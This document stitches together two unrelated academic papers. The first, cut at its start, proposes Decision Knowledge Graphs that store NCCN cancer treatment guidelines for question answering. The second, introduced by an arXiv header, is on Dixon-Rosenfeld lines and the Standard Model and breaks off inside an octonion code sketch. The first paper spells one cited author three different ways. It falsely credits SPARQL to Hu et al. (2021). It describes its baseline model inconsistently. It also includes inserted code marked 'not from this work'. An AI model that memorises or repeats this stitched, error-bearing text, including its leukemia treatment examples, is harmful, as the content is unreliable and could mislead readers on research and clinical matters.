hospitals in the US, which is an average of 91,000 admissions per day. As the number of patients is increasing, there is heavy workload on doctors, and they may have limited time to review and implement complex guidelines. Also, doctors may be unfamiliar with CPGs due to lack of training, and frequent changes in guidelines over time. Lack of familiarity with CPGs can be a barrier to their use in clinical practice, as doctors may not be aware of the most up-to-date recommendations or may not know how to apply the guidelines to their patients. Therefore, to promote the usage of CPGs, the above barriers need to be overcome. One way to achieve this is by digitizing the guidelines and providing assistance when referring the guidelines using technology. The existing Knowledge Graph representation on which searching and question-answering can be performed is not suitable for storing CPGs as CPGs contain a decision-based structure along with factual data and these decisions in CPGs are updated frequently. 
Given the following guideline: _"Patient can be treated with chemotherapy if age less than 65"_ The existing KG extraction model gave: Subject: _Patient_; Predicate: _can be treated with_; Object: _chemotherapy_. Therefore, the extracted triple is (_patient, can be treated with, chemotherapy_). The model ignored the condition of age less than 65, which is important for guiding the doctor. Therefore, a good CPG knowledge graph should represent not only concepts but also decisions (attributes). If the above guideline is updated to: _"Patient can be treated with chemotherapy if age less than 65 and greater than 35. He should not have any substantial comorbidities."_ The existing KG model will require many changes in its structure (i.e., number of nodes and relations). A good CPG knowledge graph representation should have an efficient updating capability with few changes. Nowadays, pretrained models perform well on question-answering tasks, but one limitation is that there is not sufficient data to train such a model on CPGs. Even if we create a large dataset and train the model, the treatment guidelines change frequently, so the dataset would also have to be updated along with the guidelines, which is another limitation. Considering this, storing the CPGs seems a better approach than pretraining models. Our contributions are: 1. Creation and release of a knowledge graph (KG) with an additional decision dimension added to some nodes in the existing KG structure for storing clinical practice guidelines, _i.e., Decision Knowledge Graph (DKG)_. 2. Creation of a dataset of triples containing 8300 questions from acute lymphoblastic leukemia, kidney, and bone cancer. Each _triple_ consists of a _question_, an _answer_, and a _cypher query_ (used to query the decision knowledge graph). 3. A question-answering model on Clinical Practice Guidelines built with the help of Decision Knowledge Graphs. The proposed model gives 40% better results compared to a fine-tuned transformer question-answering model. To the best of our knowledge, ours is the first attempt at (i) creating a knowledge graph for CPGs and (ii) adding a decision dimension to a node in a KG. The rest of the paper is organized as follows. Section 2 presents a brief survey of the literature. Section 4 introduces CPGs along with the NCCN Guidelines. Section 5 provides details about question-answering dataset creation. Section 6 explains the DKG structure along with the construction and usage of DKGs. Section 7 presents an application of DKGs, i.e., question-answering on CPGs. Section 8 provides the results and analysis. Section 9 summarizes and concludes the paper. ## 2 Related work CPGs are written based on evidence, aiming to improve the quality and efficiency of medical treatment and care. They are useful to a doctor in providing proper insights when he/she is treating a patient. Many physicians don't use CPGs. Cabana et al. (1999) claims that the main reasons for not using CPGs are their complexity, unfamiliarity, and distrust. Trust can be improved once CPGs start gaining positive attention and lead to successful treatment of patients. Complexity and familiarity need to be addressed for the usage of CPGs. CPGs were introduced in the early 90s, yet their familiarity is still a problem in the medical domain. Given the structured nature and factual data present in CPGs, it is reasonable to organize this information as a Knowledge Graph. Rossetto et al. (2020) describes a Knowledge Graph (KG) as a set of static graph triples. 
If the data is static, KG, once constructed, needs no modifications and can be used to perform question-answering and searching tasks. Once the KG is constructed, modifying the KG is costly and takes time as modification involves updating, changing, or deleting multiple nodes and relations which can propagate. Therefore, at times, KG needs to be reconstructed because of some modifications. Construction of a KG involves many steps like co-reference resolution, information extraction, etc. Rossetarez et al. (2020) provides a detailed pipeline of KG construction for biomedical scientific literature. Many existing approaches to constructing KG ignore the conditional statements that are present in the sentences. Jiang et al. (2019) explains how existing ScienceIE models capture factual data and will not consider conditional statements. i.e., An existing system would return the tuple (alkaline pH, increases, activity of TRPV5/V6 channels in Jurkat T cells) if the statement "alkaline pH increases the activity of TRPV5/V6 channels in Jurkat T cells" was given. However, in this case the condition tuple (TRPV5/V6 channels, in, Jurkat T cells) was not identified. Jiang et al. (2020) emphasizes the importance of conditional statements in biomedical data. They also propose a KG representation with conditional statements. The conditional statements are added to the existing KG structure but this structure is not suitable for clinical practice guidelines because updating is not efficient in the current KG structure. From the survey conducted by Liang et al. (2022), many KG question-answering models were relying on rules, keywords, neural networks, etc. After the introduction of SPARQL by Hu et al. (2021), which is a query language to search and modify a KG, retrieving data from KG became easy. Therefore, many question-answering models were proposed using KG. The existing representations of CPGs are complex and unfamiliar as mentioned in Cabana et al. (1999). Manually searching data in CPGs takes time. During emergencies, time is valuable and lack of time can cost lives. A representation for CPGs on which question-answering and searching can be performed will help a lot in emergencies. This representation can also motivate practitioners and doctors to use guidelines. So far, no attempt has been made for representing CPGs to perform question-answering and searching tasks. ## 3 Background In this section, we briefly describe decision knowledge graph and question-answering system. ### Decision Knowledge Graph Decision knowledge graph is a knowledge graph structure with decision dimension added to its structure. We store data related to patients' parameters and conditions of patient in decision dimension. This data is called as _Patient's Constraints_ which are often referred to as _Constraints_ in rest of the paper. Some of the examples of patients' constraints are _Age, tumor size, disease stage, past medical history, etc._ We divide data into static and dynamic data. Static data refers to the data in Clinical Practice Guidelines (CPGs) which changes less frequently or doesn't change at all. _Example: Treatment procedure like chemotherapy etc._ Dynamic data refers to the data in the CPGs which changes frequently. Here, dynamic data doesn't refer to data from a query like the name of the patient, etc. It refers to the data that should be present in the KG to make a decision. _Example: Patient constraints_. 
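To make the distinction concrete, the following is a minimal Python sketch of our own (the property names and constraint values are illustrative, not taken verbatim from the guidelines): a decision node keeps its factual content separate from a set of dynamic constraint properties, so a guideline revision only rewrites the constraints and leaves the node and the graph structure untouched.

```python
# Static data: the treatment content, which rarely changes.
# Dynamic data: the decision dimension holding patient constraints.
chemo_node = {
    "content": "Patient can be treated with chemotherapy",
    "constraints": {"age": "< 65"},
}

def update_constraints(node, new_constraints):
    """A guideline update only replaces the constraint properties;
    no nodes or relations are added, deleted, or re-linked."""
    node["constraints"] = dict(new_constraints)
    return node

# Hypothetical revision mirroring the updated guideline from Section 1:
update_constraints(chemo_node, {
    "age": "> 35 and < 65",
    "comorbidities": "no substantial comorbidities",
})
```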
### Question-Answering System A question-answering system is a model that is trained to generate the correct answer to a given question. There are many ways to approach question-answering. One way is a language model trained on input-output pairs such that the input is a question and the output is the answer. ## 4 Clinical Practice Guidelines for Cancer Clinical Practice Guidelines (CPGs) from the National Comprehensive Cancer Network (NCCN) are used for building the Decision Knowledge Graph (DKG). These are also referred to as Cancer Guidelines, NCCN Guidelines, or Oncology Guidelines. NCCN is a non-profit alliance dedicated to facilitating effective, quality, and accessible cancer care. The organization is home to research and guidelines for around 60 types of cancer, including breast cancer, lung cancer, kidney cancer, etc. For the past 25 years, these guidelines have been updated regularly based on discussions among world-renowned experts from NCCN member institutions. A snapshot of the NCCN Guidelines, taken from page 12 of Acute Lymphoblastic Leukemia (ALL) Cancer Version 1.2022, is shown in Figure 1. The NCCN guidelines include: 1. A list of members and institutions that participated in the specified discussions. 2. Flowcharts for better understanding of decision making. 3. Discussions to provide support for the flowcharts. 4. Evidence for recommendations and disclosure of potential conflicts of interest by panel members (members who attended the discussion). Figure 1: Fragment of Clinical Practice Guidelines by the National Comprehensive Cancer Network from page 12 of Acute Lymphoblastic Leukemia (ALL) cancer Version 1.2022, which shows how a ph+ (Philadelphia chromosome) ALL patient should be treated in the induction phase of ALL cancer. Refer to Appendix E for a detailed explanation of the above fragment. The flowchart section of the guidelines consists of text boxes and arrows connecting these boxes, as shown in Figure 1. Some of the words in the text have superscripts and subscripts. Superscripts and subscripts are described in detail in the footnotes of the document. Some text contains hyperlinks that refer to other pages in the same document. For more details on the CPGs used in this paper, refer to Appendix D. ## 5 Dataset Creation The main objective of a Decision Knowledge Graph (DKG) is to perform question-answering, thus reducing the manual effort of a doctor in searching through the guidelines. There are no available question-answering datasets on Clinical Practice Guidelines. We have created a CPG-QA dataset with 8300 question-answer pairs. This dataset consists of three main types of questions. Types of questions: 1. **What is the next treatment advice given a patient's constraints (refer to Section 3.1 for more details on constraints).** _Example: A patient is ALL positive. After his initial diagnosis, he is classified as a ph- patient. His age is 65. He has not been treated with other cancer treatments. What treatment is recommended in this condition?_ 2. **What are the patient's medical constraints that need to be satisfied given a treatment stage.** _Ex: A patient is ALL positive. After his initial diagnosis, he is classified as a ph+ patient. What are the patient constraints for performing chemotherapy?_ 3. **Given a patient's medical constraints and treatment stage, is a particular treatment advisable or not?** _Ex: A patient is ALL positive. After his initial diagnosis, he is classified as a ph- patient. His age is 65. He has not received any other cancer treatment. 
Can we perform TKI + Chemotherapy on him?_ The dataset also consists of cypher queries for question-answering pairs which are used to query the DKG. These cypher queries are manually constructed given a question. We have verified the correctness of the queries by running them on DKG and matching the outputs of DKG with the expected answer. The format of the dataset is: Examples can be referred from Appendix B. ## 6 Decision Knowledge Graphs This section presents the decision knowledge graph (DKG), its construction, and details on how operations like updating, deleting, and insertion, can be performed on DKGs. ### Introduction In the Knowledge Graph (KG), data is stored as triples consisting of a head entity, a relation, and a tail entity i.e., (head, relation, tail). If there is some change in the KG (i.e., updating triple, deleting triple, or adding new triple), these changes, in the worst case, can propagate to all nodes. Consider the example _given triple (Barack Obama, president of, US) if we want to update Obama to Trump then the update should be done in multiple nodes which talk about US presidency or about the individuals_. Therefore sometimes, updating a KG will become equivalent to rebuilding the KG. The update operation, therefore, is time-consuming. Clinical Practice Guidelines (CPGs) are updated frequently. Hence, KG structure won't be of much help for CPGs as it would require the costly update operation frequently. From the previous few versions of guidelines, we have observed that not all content in the guidelines is changed. The modifications that are made to guidelines, based on discussions, are mainly done on patients' constraints (refer to Section 3.1 for definition). The treatment steps of chemotherapy are not changed but when to perform chemotherapy based on the patient's condition is changed. Therefore, using this observation, we divide the data into static and dynamic data. Static data is the data in CPGs that changes less frequently or doesn't change at all. Dynamic data is the data in CPGs which changes frequently. Here, dynamic data doesn't refer to data from a query like the name of the patient, etc. It refers to the data that should be present in the KG to make a decision. _For example, treatment procedure like chemotherapy is static data and patients' constraints like age>60, MRD rising, etc., is dynamic data._ DKG is a knowledge graph over which we have introduced a decision layer. This decision dimension will consist of dynamic data. Static data is stored as KG triples extracted as proposed by Rossanez et al. (2020). For example, if there is a node, "chemotherapy", we have relations like "procedure", "drugs used", "duration" etc., which comes under static data. When updating a KG, only dynamic data needs to be changed without changing the structure of the KG and static data. Therefore, performing updates on DKG will be a more cost-effective task than updating a KG. Here the static data is stored as a KG. For example, if there is a node, "chemotherapy", we have relations like "duration", "drugs used" etc. Therefore, factual data is stored as we do in a KG, but conditional data is stored in decision nodes. ### Construction of Decision Knowledge Graph DKG is constructed by three main modules as shown in Figure 2: PDF Parser, Constraint Extractor, and DKG builder. #### 6.2.1 PDF Parser Input to the PDF parser is the CPG PDF file. The PDF Parser recognizes the text in text boxes in the CPGs using optical character recognition (OCR). 
Superscripts and subscripts on the text, as described in Section 4, are replaced with the text given in the footnotes. Hyper-texts in the text boxes, also described in Section 4, are replaced with the content they point to. The output of the PDF parser is a CSV file with two columns: the first column corresponds to the head entity (the text in the box at the arrow tail), and the second column corresponds to the tail entity (the text in the box at the arrowhead). #### 6.2.2 Constraint Extraction The constraint extractor iterates over each sentence in the CSV file generated above. For each input sentence, it outputs the constraints (refer to Section 3.1 for definition) present in that sentence. If a sentence contains no constraints, NULL is returned. If there are multiple constraints, they are returned separated by a comma (,). The constraint extractor is a hybrid (rule-based and deep-learning-based) model that uses the output of a constituency parser. The input sentence is first pre-processed; the pre-processed sentence is then tokenized and passed to the constituency parser, whose output is a tree-based structure (refer to Appendix A for more details). The tree nodes are merged recursively with regular-expression rules that link entities which are close to each other. Stop words and verbs are removed from the sentence, and mathematical words are replaced by their symbols. This final output is given to a keyword-based extractor to obtain the constraints. The output of the constraint extractor is stored in the constraint column of the CSV file along with the sentence. #### 6.2.3 DKG Builder The generated CSV file has four columns: Head entity, Head Constraints, Tail entity, and Tail Constraints. These are used to build the DKG. The head entity is a sentence, stored as data in the head node, and the head constraints are the patients' constraints, separated by a comma (,). Similarly, the tail entity and tail constraints are the tail node's data and its patients' constraints. The head entity and the tail entity are stored as static data, and the head and tail constraints as dynamic data. We have used the neo4j graph database (licensed and distributed under GPL v3) to store this knowledge graph. Loading the CSV file into neo4j can be done using the _"LOAD CSV FROM <path_to_csv>"_ command. As the neo4j graph database allows multiple property-value pairs in a single node, we store the static data under the property name "content" and each constraint under a property name that depends on the type of constraint, as shown in Figure 2. ### Searching in Decision Knowledge Graph We use the Cypher Query Language (CQL) to query the DKG. CQL is analogous to the Structured Query Language (SQL): SQL is used to query popular relational database management systems such as PostgreSQL and MySQL, while CQL is used to query the neo4j graph database. The syntax used by CQL is of the ASCII-art variety, with _(nodes)-[:ARE_CONNECTED_TO]->(otherNodes)_ employing rounded brackets for circular _(nodes)_ and _-[:ARROWS]->_ for relationships. Writing a query creates a graph pattern over the data. We can use a _MATCH_ query to search the DKG. If we want to know the next treatment step for a patient who is _ph+ ALL_ and whose Minimal Residual Disease (MRD) is _rising_, then the corresponding CQL query is: _MATCH (m: node stratified='ph+', MRD:'rising')-[:next_step]->n RETURN n.treatments_. Here, \(m\) and \(n\) are node variables.
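For readers who prefer to issue such queries programmatically, the sketch below shows how a query of this kind could be sent to the graph database from Python using the official neo4j driver. It is a minimal illustration and not code from this work: the connection URI, the credentials, the node label `node`, and the property names `stratified`, `MRD`, and `treatments` are assumptions based on the description above, and the constraints are written in Cypher's property-map syntax.

```python
# Minimal sketch (not from this work): querying the DKG for the next treatment
# step of a ph+ ALL patient with rising MRD, via the official neo4j Python driver.
# URI, credentials, node label, and property names are assumptions.
from neo4j import GraphDatabase

URI = "bolt://localhost:7687"   # assumed local neo4j instance
AUTH = ("neo4j", "password")    # assumed credentials

QUERY = """
MATCH (m:node {stratified: $stratified, MRD: $mrd})-[:next_step]->(n)
RETURN n.treatments AS treatments
"""

def next_treatment(stratified: str, mrd: str):
    """Return the recommended next treatment(s) for the given patient constraints."""
    driver = GraphDatabase.driver(URI, auth=AUTH)
    try:
        with driver.session() as session:
            result = session.run(QUERY, stratified=stratified, mrd=mrd)
            return [record["treatments"] for record in result]
    finally:
        driver.close()

if __name__ == "__main__":
    print(next_treatment("ph+", "rising"))
```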
### Operations on Decision Knowledge Graph We can perform the following operations on a DKG: deleting a constraint, inserting a new constraint, and updating a constraint. Deleting a constraint can be done using the command _"MATCH node REMOVE constraint"_. Inserting a constraint can be done using the command _"MATCH node SET constraint"_. Updating can be done by deletion followed by insertion. The time taken for performing the above operations is search time taken by _MATCH_ operation, which is _O(nodes)_ (linear), as _SET_ and _REMOVE_ operation takes _O(1)_ (constant) time. ### Constructed DKG Information The DKG is generated for three types of cancers, ALL, Bone, and Kidney. Table 1 shows the information on the number of nodes and relations in these DKGs. ## 7 Question-Answering on Clinical Practice Guidelines (CPGs) In this section, we discuss the models used to perform question-answering. ### Word Embeddings BioBERT from Lee et al. (2020) is a pre-trained biological language representation model based on the BERT from Devlin et al. (2018) (Bidirectional Encoder Representations from Transformers) architecture, which is a natural language processing neural network model. BioBert is pre-trained on a huge corpus of biomedical texts, such as PubMed, making it especially well-suited for biomedical text mining and related applications. It is pre-trained to capture the nuances of biomedical language and terminology, and has shown state-of-the-art performance on various biomedical tasks. As BioBERT has missing embeddings for words used in NCCN guidelines. We have created new embeddings us \begin{table} \begin{tabular}{|c|c|c|c|} \hline **Cancer type** & **Total** & **Decision** & **Relations** \\ \hline **ALL** & 58 & 20 & 74 \\ **Bone** & 191 & 72 & 243 \\ **Kidney** & 50 & 16 & 61 \\ **Total** & 299 & 108 & 378 \\ \hline \end{tabular} \end{table} Table 1: Results showing number of nodes and relations in DKG. \(1^{st}\) col specifies the cancer type, \(2^{nd}\) col specifies total number of nodes in the DKG structure, \(3^{rd}\) col specifies total number of decision nodes, and \(4^{th}\) col specifies total number of relations in the DKG structure. Figure 2: DKG Construction; i) PDF Parser: converts PDF of NCCN guidelines to CSV file, ii) Constraint Extractor: extracts the constraints (refer to Section 3.1 for definition) from each sentence and adds them to CSV file, iii) DKG Builder: takes the CSV and builds the DKG in neo4j graph database ing the architecture shown in Figure 4. We have used MeSH RDF dataset for domain knowledge i.e., we have checked whether the subword from NCCN guidelines is present in MeSH data or not. If the subword is not present, we have avoided training with the particular subword. Datasets of NCCN guidelines and MIMIC III are augmented for training. Subword embedding model from fast-text (MIT License) is used for training. Embedding correctness is checked using analogy task. ### Question-Answering without DKG Figure 5 shows the architecture of the model. A transformer is used to perform question-answering (QA) task. Here, the model takes a question (natural language question specifying the conditions of the patient) and generates an answer (recommended next treatment procedure). We split the data into 70% train, 15% validation and 15% testing. The model consists of 19 million parameters with 8 heads, 256 latent dimension. 
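As a rough illustration of the sequence-to-sequence setup described above (the same configuration, 8 heads and a 256-dimensional latent space, is reported for the DKG-based query-generation model in the next section), the following sketch configures a small encoder-decoder transformer in PyTorch. This is a hedged sketch and not the authors' implementation: the vocabulary size, layer counts, and feed-forward width are assumptions, positional encodings and masking are omitted for brevity, and the resulting parameter count will only roughly approach the reported 19 million.

```python
# Minimal sketch (assumptions marked): a seq2seq transformer for QA matching
# only the reported 8 attention heads and 256-dimensional latent space.
import torch
import torch.nn as nn

VOCAB_SIZE = 8000   # assumption: subword vocabulary size
D_MODEL = 256       # latent dimension reported in the paper
N_HEADS = 8         # attention heads reported in the paper
N_LAYERS = 4        # assumption
FFN_DIM = 1024      # assumption

class QATransformer(nn.Module):
    def __init__(self):
        super().__init__()
        self.embed = nn.Embedding(VOCAB_SIZE, D_MODEL)
        self.transformer = nn.Transformer(
            d_model=D_MODEL, nhead=N_HEADS,
            num_encoder_layers=N_LAYERS, num_decoder_layers=N_LAYERS,
            dim_feedforward=FFN_DIM, batch_first=True)
        self.out = nn.Linear(D_MODEL, VOCAB_SIZE)

    def forward(self, question_ids, answer_ids):
        # question_ids, answer_ids: (batch, seq_len) token-id tensors
        src = self.embed(question_ids)
        tgt = self.embed(answer_ids)
        hidden = self.transformer(src, tgt)
        return self.out(hidden)  # logits over the vocabulary

model = QATransformer()
print(sum(p.numel() for p in model.parameters()))  # rough parameter count
```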
Figure 4: Model to generate embeddings for missing words and improve existing embeddings from the NCCN guidelines. Figure 5: Question Answering without DKG; a transformer model trained on questions and answers from the guidelines. Figure 3: Question Answering using DKG; i) the Query Building Module builds the cypher query from the given natural language (NL) question, ii) the Neo4j graph database fetches the node from the DKG according to the query and returns the content of the node. ### Question-Answering with DKG Figure 3 shows the architecture of the proposed model. As discussed in Section 6.3, we need CQL to query the DKG. Given a natural language question from the user, a transformer model converts the question into a CQL query. We use the dataset created in Section 5 to train this model. The generated query is post-processed based on the syntax of CQL, and the parameters of the post-processed query are verified against the question. The generated CQL query is then used to retrieve data from the neo4j database: neo4j retrieves the node of the DKG matching the CQL query, and the content of this node is the answer to the natural language question. We split the data into 70% train, 15% validation, and 15% testing. The model consists of 19 million parameters with 8 heads and a latent dimension of 256. ## 8 Results and Analysis Table 2 shows the results for both question-answering models, with and without DKG. Using the DKG improves accuracy (calculated as the number of correct matches divided by the total number of questions) by about 40 percentage points compared to the purely deep-learning model, and the model with DKG outperforms on every metric. This shows that encoding the knowledge in the guidelines helps produce better results. Two reasons for this improvement are dataset size, since transformers are data hungry and need a large amount of data to perform well, and the lack of domain knowledge in the model without DKG. * **Question:** _A 68-year-old ph- ALL patient without any significant comorbidities underwent a clinical trial during the treatment induction phase, achieving a CR response assessment. He was monitored with persistent rising MRD. What procedures are recommended?_ * **Actual Answer:** _Blinatumomab followed by Allogenic HCT_ * **Predicted Answer (without DKG):** _Allogenic HCT (especially if high-risk features or consider continuing multiagent chemotherapy or Blinatumomab_ * **Predicted cypher query:** _MATCH (m: decision_node stratified='ph-', MRD:'rising')-[:next_step]-> n RETURN n.treatments_ * **Predicted Answer (with DKG):** _Blinatumomab followed by Allogenic HCT_ ## 9 Conclusion and Future Work In conclusion, representing clinical practice guidelines (CPGs) digitally is challenging. The proposed novel structure, the Decision Knowledge Graph (DKG), can effectively store CPGs. In addition to factual data, the DKG encodes decision-based structures, which are the parts of CPGs that change most often. Our work makes a significant addition to the field of representing medical knowledge and can help practitioners and doctors make well-informed judgments about a patient's treatment. It also contributes to the NLP community by providing a representation for storing knowledge that has a decision-based structure. The model is intended to be used by professional practitioners and doctors only and for recommendation purposes; one should not rely solely on the model's recommended treatment.
The DKG in this paper is constructed only for the NCCN guidelines, but the structure can be used for other guideline data. It is not restricted to the medical domain and can also be extended to other domains, such as construction guidelines in civil engineering. ## Limitations The model can suggest recommended treatment procedures for the ALL cancer type based on version 1.2022 of the NCCN guidelines for ALL. This recommended treatment still needs the involvement of a doctor: the system does not replace the doctor's work, but helps make it faster. The work done is limited to CPGs and to data having decision-based behaviour; the DKG is not useful for storing data that does not have this behaviour. \begin{table} \begin{tabular}{|c|c|c|} \hline **Metric** & **Without DKG** & **With DKG** \\ \hline ROUGE precision & 0.49 & 0.95 \\ ROUGE recall & 0.62 & 0.96 \\ ROUGE f-measure & 0.51 & 0.96 \\ BLEU & 0.44 & 0.95 \\ Jaccard & 0.46 & 0.92 \\ Accuracy & 0.259 & **0.676** \\ \hline \end{tabular} \end{table} Table 2: Results on QA with DKG and without DKG; \(1^{st}\) col corresponds to various metrics; the baseline model (the \(2^{nd}\) col) is a fine-tuned BioBERT model as described in Figure 5; the proposed model (the \(3^{rd}\) col) is a transformer model with Decision Knowledge Graph (DKG) support as described in Figure 3. Metric definitions are given in Appendix C.
2303.11334
Dixon-Rosenfeld Lines and the Standard Model
We present three new coset manifolds named Dixon-Rosenfeld lines that are similar to Rosenfeld projective lines except over the Dixon algebra $\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}$. Three different Lie groups are found as isometry groups of these coset manifolds using Tits' formula. We demonstrate how Standard Model interactions with the Dixon algebra in recent work from Furey and Hughes can be uplifted to tensor products of division algebras and Jordan algebras for a single generation of fermions. The Freudenthal-Tits construction clarifies how the three Dixon-Rosenfeld projective lines are contained within $\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})$, $\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})$, and $\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})$.
David Chester, Alessio Marrani, Daniele Corradetti, Raymond Aschheim, Klee Irwin
2023-03-18T01:11:31Z
http://arxiv.org/abs/2303.11334v2
# Dixon-Rosenfeld Lines and the Standard Model ###### Abstract We present three new coset manifolds named Dixon-Rosenfeld lines that are similar to Rosenfeld projective lines except over the Dixon algebra \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Three different Lie groups are found as isometry groups of these coset manifolds using Tits' formula. We demonstrate how Standard Model interactions with the Dixon algebra in recent work from Furey and Hughes can be uplifted to tensor products of division algebras and Jordan algebras for a single generation of fermions. The Freudenthal-Tits construction clarifies how the three Dixon-Rosenfeld projective lines are contained within \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\), and \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). ###### Contents * I Introduction and Motivation * II.1 Tensor products on unital composition algebras * II.2 The Dixon algebra * II Dixon-Rosenfeld lines * II.1 Dixon lines as coset manifold * II.2 Tits' magic formula * II.3 Three isometry groups * II.4 Three Dixon lines * III Relationship with octonionic Rosenfeld lines * IV Projective lines over \(\mathbb{C}\otimes\mathbb{H}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) * IV.1 Generalized minimal left ideals of \(\mathbb{C}\otimes\mathbb{H}\) * IV.2 Generalized minimal left ideals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) * V Projective lines over \(\mathbb{C}\otimes\mathbb{O}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{O})\) * V.1 Minimal left ideals of \(\underline{Cl(6)}\) via chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\) * V.2 Uplift of \(\mathbb{Cl}(6)\) in \(\mathbb{C}\otimes\overline{J_{2}(\mathbb{O})}\) * VI Projective lines over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) * VI.1 One generation from \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) * VI.2 Uplift to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) * VI.3 Uplift to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) * VI.4 Uplift to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) * VII Conclusions * VIII Acknowledgments Introduction and motivation We focus on the definition of three coset manifolds of dimension 64 that we call _Dixon-Rosenfeld lines_. Each contains an isometry group whose Lie algebra is obtained from Tits' magic formula. These three constructions are obtained similarly to how projective lines are obtained over \(\mathbb{R},\mathbb{C},\mathbb{H}\) and \(\mathbb{O}\); therefore, they can be thought of as "generalized" projective lines over the Dixon algebra \(\mathbb{T}\equiv\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) in the sense presented by Rosenfeld in [11, 12, 13]. The division algebras have been used for a wide variety of applications in physics [14, 15, 16, 17, 18]. In 1973, Gursey and Gunaydin discussed the relationship of octonions to QCD, since \(SU(3)\) is a maximal subgroup of automorphisms over the octonions \(\operatorname{Aut}(\mathbb{O})=G_{2}\)[15, 16, 17]. Later, Dixon introduced the algebra \(\mathbb{T}\equiv\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) for a single generation of fermions in the Standard Model [19, 20, 21, 22]. This line of investigation was revived when Furey further explored the Standard Model with the Dixon algebra [23, 24, 25, 26, 27, 28, 29] and Castro introduced gravitational models involving the Dixon algebra [20, 21, 22]. 
Recently, Furey and Hughes focused on Weyl spinors for one generation of the Standard Model fermions with \(\mathbb{T}\)[23, 24]. Our work on Dixon-Rosenfeld lines defines three homogeneous spaces that locally embed a representation of \(\mathbb{T}\) to encode one generation of fermions in the Standard Model. Section (II) shows that three coset manifolds of real dimension 64 are possible, giving three non-simple Lie algebras as isometry groups that are obtained from Tits formula. Section (III) analyzes the relationship between the new Dixon-Rosenfeld lines with the Rosenfeld lines. Section (IV) uplifts scalar, spinor, vector, and 2-form representations of the Lorentz group representations with \(\mathbb{C}\otimes\mathbb{H}\) from Furey [23] to \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). Section (V) uplifts the Standard Model fermionic charge sector described by Furey with \(\mathbb{C}\otimes\mathbb{O}\)[23] to \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). Section (VI) uplifts recent work by Furey and Hughes for encoding Standard Model interactions with \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\)[24] to the three different realizations of the Dixon-Rosenfeld lines via \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\), and \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). Section (VII) concludes with a summary of our work and outlines prospects for future work. ### Tensor products on unital composition algebras An _algebra_ is a vector space \(X\) with a bilinear multiplication. Different properties of the multiplication give rise to numerous kind of algebras. Indeed, for what it will be used in the following sections, an algebra \(X\) is said to be _commutative_ if \(xy=yx\) for every \(x,y\in X\); is _associative_ if satisfies \(x\left(yz\right)=\left(xy\right)z\); is _alternative_ if \(x\left(yx\right)=\left(xy\right)x\); _flexible_ if \(x\left(yy\right)=\left(xy\right)y\) and, finally, _power-associative_ if \(x\left(xx\right)=\left(xx\right)x\).[14] It is worth noting that the last four proprieties are progressive and proper refinements of associativity, i.e. \[\text{associative}\Rightarrow\text{alternative}\Rightarrow\text{flexible} \Rightarrow\text{power-associative}.\] Every algebra has a zero element \(0\in X\), since \(X\) has to be a group in respect to the sum, but if it also does not have zero divisors, then \(X\) is called a _division_ algebra, i.e. if \(xy=0\) then or \(x=0\) or \(y=0\). While the zero element is always present in any algebra, if it exists an element \(1\in X\) such that \(1x=x1=x\) for all \(x\in X\) then the algebra is _unital_. Finally, if we can define over \(X\) an involution, called _conjugation_, and a quadratic form \(N\), called _norm_, such that \[N\left(x\right) =x\overline{x}, \tag{1}\] \[N\left(xy\right) =N\left(x\right)N\left(y\right), \tag{2}\] with \(x,y\in X\) and \(\overline{x}\) as the conjugate of \(x\), then the algebra is called a _composition_ algebra. A well-known theorem due to Hurwitz [30] states that \(\mathbb{R}\), \(\mathbb{C}\), \(\mathbb{H}\) and \(\mathbb{O}\) are the only four normed division algebras that are also unital and composition [13, 20]. More specifically, \(\mathbb{R}\) is also totally ordered, commutative and associative; \(\mathbb{C}\) is just commutative and associative; \(\mathbb{H}\) is only associative and, finally, \(\mathbb{O}\) is only alternative, as summarized in Table (1). 
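The properties summarized in Table (1) are easy to probe numerically. The sketch below builds the octonions from pairs of quaternions via the Cayley-Dickson construction and checks, on random elements, that the multiplication is neither commutative nor associative but does satisfy the alternative law \(x(xy)=(xx)y\). It is an illustrative sketch only: the Cayley-Dickson sign conventions used here are one common choice and are not claimed to match the basis conventions adopted later in this paper.

```python
# Illustrative sketch: on random elements, the octonions are alternative but
# neither commutative nor associative.  The Cayley-Dickson convention below,
# (a, b)(c, d) = (a c - conj(d) b, d a + b conj(c)), is one common choice.
import numpy as np

def qmul(a, b):
    """Quaternion product of a = (a0, a1, a2, a3) and b, as numpy arrays."""
    a0, a1, a2, a3 = a
    b0, b1, b2, b3 = b
    return np.array([
        a0*b0 - a1*b1 - a2*b2 - a3*b3,
        a0*b1 + a1*b0 + a2*b3 - a3*b2,
        a0*b2 - a1*b3 + a2*b0 + a3*b1,
        a0*b3 + a1*b2 - a2*b1 + a3*b0,
    ])

def qconj(a):
    return np.array([a[0], -a[1], -a[2], -a[3]])

def omul(x, y):
    """Octonion product via Cayley-Dickson doubling of the quaternions."""
    a, b = x[:4], x[4:]
    c, d = y[:4], y[4:]
    return np.concatenate([qmul(a, c) - qmul(qconj(d), b),
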